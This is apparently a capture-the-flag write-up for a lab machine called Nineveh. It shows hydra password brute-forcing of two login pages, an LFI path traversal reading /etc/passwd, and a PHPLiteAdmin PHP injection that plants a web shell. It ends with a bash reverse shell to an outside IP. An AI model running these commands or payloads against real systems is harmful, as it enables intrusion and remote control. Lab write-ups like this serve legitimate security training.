Exploitation

Exploitation on this machine is going to require hydra and steg to gain a reverse shell

Hydra

HTTP /department/login.php

hydra -l admin -P /usr/share/seclists/Passwords/probable-v2-top12000.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64 

• username = admin

• password = 1q2w3e4r5t

HTTPS /db/index.php

hydra -l admin -P /usr/share/seclists/Passwords/probable-v2-top12000.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64

• username = admin

• password = password123

PHP Exploit

PHPLiteAdmin 1.9.3 - Remote PHP Code InjectionExploit Database

With the following exploit an attacker can create a sqlite database with a php extension and insert php code as text fileds. When done , the attacker can execute it by accessing the database file usin a browser.

Exploiting LFI and PHP

Checking for LFI vulnerability

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes/../../../../../../etc/passwd

Executing code via PHP for Shell

In the Create New Database section, create a new database called random.php. Then click on random.php in the Change Database section.

<?php echo system($_REQUEST ["cmd"]); ?>

Back in our LFI vulnerable page

http://nineveh.htb/department/manage.php?notes=files/ninevehNotes/../../../../../../var/tmp/random.php&cmd=ls

/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.34/1234 0>&1'